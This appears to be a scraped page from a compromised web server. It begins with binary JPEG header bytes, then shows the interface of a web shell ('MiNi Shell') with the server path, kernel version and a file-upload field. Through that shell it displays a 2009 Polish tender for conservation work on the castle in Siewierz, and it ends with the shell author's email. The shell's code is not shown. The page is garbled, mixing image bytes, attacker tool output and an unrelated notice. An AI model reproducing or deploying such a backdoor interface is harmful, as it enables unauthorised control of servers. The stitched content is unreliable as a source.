JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/162422-N-2009.html

<p class="kh_header"><b>Siewierz: Wykonanie prac budowlano-konserwatorskich na Zamku w Siewierzu- etap III</b><br>
<b>Numer ogłoszenia: 162422 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , ul. Żwirki i Wigury 16, 42-470 Siewierz, woj. śląskie, tel. 0326499471, 6499400, faks 032 6499402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> siewierz.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac budowlano-konserwatorskich na Zamku w Siewierzu- etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie prac budowlano-konserwatorskich na Zamku w Siewierzu - etap III.
Przedmiot zamówienia obejmuje w szczególności:
1.Roboty konserwatorskie, zabezpieczające i budowlane na wszystkich murach wewnętrznych i zewnętrznych skrzydła zachodniego (mury w pierwszej i drugiej linii), na które składają się w szczególności:
a)roboty oczyszczające mury z roślinności,
b)uzupełnienie i przemurowanie fragmentów murów,
c)naprawa górnej warstwy murów, występów i odsadzek,
d)naprawa lica przypór,
e)klejenie rys i spękań,
f)podniesienie kominów
g)zabezpieczenie luźnych elementów,
h)hydrofobizacja.
2.Roboty konserwatorskie, zabezpieczające i budowlane na ścianie południowej Zamku wraz z jej odbudową, na która składa się szczególności:
a)roboty oczyszczające i rozbiórkowe,
b)uzupełnienie i przemurowanie fragmentów murów,
c)naprawa lica przypór,
d)klejenie rys i spękań,
e)budowa nowej części ściany,
f)wykonanie powierzchniowej hydrofobizacji całej ściany,
g)zabezpieczenie przed graffiti.
3.Wykonanie posadzki w piwnicy pod skrzydłem zachodnim Zamku wraz z pracami konserwatorskimi, zabezpieczającymi i budowlanymi murów i sklepień wewnętrznych w tej piwnicy, na co składa się w szczególności:
a)remont posadzki,
b)wykonanie schodów,
c)wykonanie barierki,
d)remont ścian i sklepienia,
e)rekonstrukcje elementów stałych jako ekspozycja,
f)rekonstrukcja przesklepienia wejścia piwnicy,
g)dostawa drzwi jednoskrzydłowych stylizowanych wraz z wymianą.
4.Wykonanie przesklepienia nad wejściem do piwnicy pod skrzydłem zachodnim Zamku, na które składa się w szczególności:
2.wykonanie sklepienia,
3.wypełnienie pach keramzytem,
4.hydrofobizacja.
5.Wymianę bramy głównej, na którą składają się w szczególności:
4.wykonanie nowej bramy i jej dostawa,
5.roboty demontażowe,
6.uzupełnienie i przemurowanie muru,
7.montaż bramy dwuskrzydłowej.
6.Budowę zasilania elektroenergetycznego Zamku w Siewierzu - z wyłączeniem dostawy i montażu agregatu prądotwórczego, obejmującą w szczególności:
a)roboty przygotowawcze i demontażowe,
b)demontaż szafy kablowej,
c)budowa linii kablowej ,
d)montaż rozdzielni i montaż aparatów w rozdzielniach,
e)budowa wewnętrznych linii zasilających,
f)montaż osprzętu,
g)wykonanie niezbędnych badań i pomiarów.
Wykonawca ponadto będzie zobowiązany do: 
a)urządzenia terenu budowy i odpowiedniego jego zabezpieczenia,
b)wykonania robót zabezpieczających, odtworzeniowych zgodnie z projektem,
c)wykonania przyłączeń wodociągowych i energetycznych dla potrzeb terenu budowy oraz ponoszenia kosztów  zużycia tych mediów,
d)poniesienia ewentualnych kosztów wyłączeń i włączeń energii elektrycznej,
e)wykonania i stosowania w praktyce zapisów  projektu organizacji i technologii robót z uwzględnieniem warunków bhp,
f)oznakowania terenu budowy i zapewnienia odpowiednich zabezpieczeń bhp,
g)wykonania niezbędnych badań, prób i pomiarów oraz wszystkich badań, prób
i pomiarów na każde polecenie inspektorów nadzoru w celu stwierdzenia prawidłowości wykonanych robót,
h)dokonania odkrywek w przypadku nie zgłoszenia do odbioru robót ulegających zakryciu lub zanikających,
i)w przypadku zniszczenia lub uszkodzenia w toku realizacji: robót, ich części, urządzeń lub też elementów istniejących- naprawienia ich i doprowadzenie do stanu pierwotnego,
j)wykonania badań, prób i rozruchu, jak również do dokonania odkrywek w przypadku nie zgłoszenia robót do odbioru ulegających zakryciu lub zanikających,
k)dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania przedmiotu umowy i przekazania go do użytku,
l)odpowiedniego zabezpieczenia terenu budowy,
m)zapewnienia uprawnionego nadzoru i dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy,
n)utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwania na bieżąco zbędnych materiałów, odpadów i śmieci,
o)uporządkowania terenu budowy po zakończeniu robót i przekazanie go Zamawiającemu najpóźniej do dnia odbioru końcowego,
p)wykonawca jest zobowiązany do przywrócenia terenu po wykonywanych robotach przynajmniej do stanu pierwotnego (chyba, że z uzgodnień szczególnych wynika większy zakres odtworzenia). 
q)wykonania robót z należytą starannością nie powodującego uszkodzenia istniejących sieci uzbrojenia terenu, a w przypadku takiego uszkodzenia wykonawca zobowiązuje się do niezwłocznej naprawy uszkodzeń na własny koszt,
r)materiały i części uzyskane z rozbiórki konstrukcji lub części robót stanowią własność Zamawiającego i Wykonawca winien przedsięwziąć wszelkie środki ostrożności niezbędne dla ich zachowania. Niezależnie od celu, w jakim Zamawiający zamierza użyć rzeczone materiały i części, do których zastrzega on sobie prawo własności, wszelkie koszty poniesione na transport i składowanie w miejscu wskazanym przez Zamawiającego będą pokryte przez Wykonawcę przy transporcie na odległość do 5 km.
s)uzgodnienia robót z zarządcami dróg i sieci uzbrojenia terenu i wykonanie ich zgodnie z wytycznymi.
t)wykonania innych prac, których wykonanie będzie niezbędne dla prawidłowej realizacji przedmiotu zamówienia.
u)zapewnienia obsługi geodezyjnej w celu wytyczenia, bieżącej kontroli                          i inwentaryzacji oraz naniesienia wykonanych elementów na zasoby geodezyjne (inwentaryzacja powykonawcza).
Pozostałe warunki zlecenia: 
1.Wykonawca jest zobowiązany do stałej współpracy z Zamawiającym w celu koordynowania prawidłowego przebiegu prac oraz wykonać przedmiot zamówienia zgodnie z wytycznymi Zamawiającego.
2.Zamawiający planuje uzyskać dofinansowanie realizacji zadania z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. W związku z powyższym procedury związane z odbiorami częściowymi, końcowym i płatnościami będą dostosowane do wymogów instytucji zarządzającej RPO WŚ.
3.Kierownika robót konserwatorskich oraz nadzór archeologiczny zapewni Zamawiający.
4.Wykonawca jest zobowiązany do współpracy z prowadzącym nadzór archeologiczny w celu zapewnienia niezbędnych odkrywek na każdym etapie trwania prac.
5.Materiały budowlane i ich producenci wymienione w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót lub przedmiarach robót zostały wskazane przykładowo. 
6.W trakcie robót Wykonawca zobowiązany będzie przedstawić materiały do akceptacji inspektorowi nadzoru z ramienia Zamawiającego przed ich zastosowaniem lub wbudowaniem.
7.Szczegółowy zakres robót zostanie ujęty w harmonogramie rzeczowo-finansowym opracowanym na podstawie dokumentacji projektowej, kosztorysu ofertowego, specyfikacji technicznej wykonania i odbioru robót, oferty wykonawcy oraz wytycznych Zamawiającego i będzie stanowił załącznik do umowy. Wykonawca przedstawi Zamawiającemu harmonogram do akceptacji w ciągu 14 dni od daty przekazania placu budowy.
8.Wykonawca udzieli gwarancji jakości na przedmiot umowy nie mniejszej niż  48 miesięcy - co zostanie potwierdzone na formularzu ofertowym - zał. Nr 1 do siwz.
9.Warunki płatności: miesięcznie, 30  dni, przelew, zgodnie z harmonogramem rzeczowo finansowym. 
Zgodnie z art.144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmiany                  w umowie polegającej na zmianie  osób  wymienionych w umowie na osoby o takich samych kwalifikacjach i nie mniejszym doświadczeniu oraz zmiany terminu realizacji umowy                  w przypadku konieczności uprzedniego wykonania robót  dodatkowych, od których realizacji uzależnione będzie zakończenie prac objętych umową podstawową..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.54-2, 45.31.57.00-5, 45.31.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca zobowiązany jest do wniesienia przed upływem terminu do składania ofert wadium w wysokości 10 000  zł (słownie: dziesięć  tysięcy  złotych).
2.Wadium może być wnoszone w jednej lub kilku następujących formach: 
         a)  pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.)
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Siewierzu nr 75844100010000000000390006
z dopiskiem wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych, spełniają wymogi art.22 ust.1 ustawy oraz spełniają warunki szczegółowe:
1. Posiadają  doświadczenie,  potwierdzone: 
wykonaniem w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie,  przynajmniej   2 robót budowlanych o wartości nie mniejszej niż 300 000 zł. każda.  Powyższe powinno wynikać z załączonego wykazu robót  oraz powinno być potwierdzone dokumentami, że prace te zostały wykonane należycie.
2.Dysponują lub będą dysponowali  osobami zdolnymi do wykonania zamówienia t.j. :  
co najmniej jedną osobą posiadającą uprawnienia  budowlane do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno-budowlnej, która będzie pełnić funkcję kierownika budowy.
Powyższe należy potwierdzić oświadczeniem złożonym w  wykazie osób , którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia oraz  pisemnym zobowiązaniem innych podmiotów  do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wykazał osoby, którymi będzie dysponował oraz wymaganymi uprawnieniami, aktualnymi zaświadczeniami o wpisie na listę członków właściwej izby samorządu zawodowego dla osób wskazanych w wykazie.
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia potwierdzone:
posiadaniem aktualnego ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej  w wysokości  co najmniej  300 000 zł.  - potwierdzone polisą, a w przypadku jej braku  innym dokumentem potwierdzającym, żeWykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu przez Wykonawcę, oferta musi zawierać niżej wymienione dokumenty:
1.Formularz oferty.
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.   Dokument, o którym mowa wyżej uważa się za aktualny, w przypadku jego wystawienia lub potwierdzenia jego aktualności przez organ wydający nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Pełnomocnictwo do reprezentowania w postępowaniu, jeżeli oferta będzie podpisana przez osobę (y) upoważnioną(e) lub w przypadku występowania podmiotów wspólnie w trybie art.23 ustawy Prawo zamówień publicznych.
4.Oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust. 1 ustawy Prawo  zamówień publicznych.
5.Oświadczenie o nie podleganiu wykluczeniu z postępowania.
6.Aktualne zaświadczenie  właściwego naczelnika  Urzędu Skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub  Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub  wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7.Aktualną informację z Krajowego Rejestru Karnego  w zakresie określonym w art.24 ust.1 pkt. 4-8 ustawy  wystawioną nie wcześniej niż  z 6 miesięcy przed upływem terminu składania ofert.
8.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt. 9 ustawy  wystawioną nie wcześniej niż  z 6 miesięcy przed upływem terminu składania ofert. 
9.Wykaz wykonanych   robót budowlanych  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem   i wartością robotom budowlanym  stanowiącym przedmiot zamówienia  z podaniem ich przedmiotu, wartości, dat i miejsca wykonania.
10.Dokumenty potwierdzające, że prace wymienione powyżej zostały wykonane     z należytą starannością.
11.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca   i które będą uczestniczyć w wykonywaniu zamówienia,  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
12.Pisemne zobowiązanie innych podmiotów  do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt.11, jeżeli  Wykonawca wykazał osoby, którymi będzie dysponował.
13.Uprawnienia budowlane w wymaganej  specjalności,  aktualne dokumenty potwierdzające wpis na listę członków właściwej izby samorządu zawodowego.
14.Polisa lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
15.Potwierdzenie wniesienia wadium.
Każdy z Wykonawców składających wspólną ofertę powinien złożyć osobno dokumenty wymienione w pkt. 2,5,6,7,8. 
1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa
 1)  w pkt.2,6 i 8  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne   i zdrowotne albo, ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)w pkt. 7 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art.24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Jeżeli w kraju pochodzenia osoby lub w kraju,   w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju,   w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siewierz.pl; www.ziewierz.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Siewierz
ul. Żwirki i Wigury 16
42-470 Siewierz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy Siewierz
ul. Żwirki i Wigury 16
42-470 Siewierz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com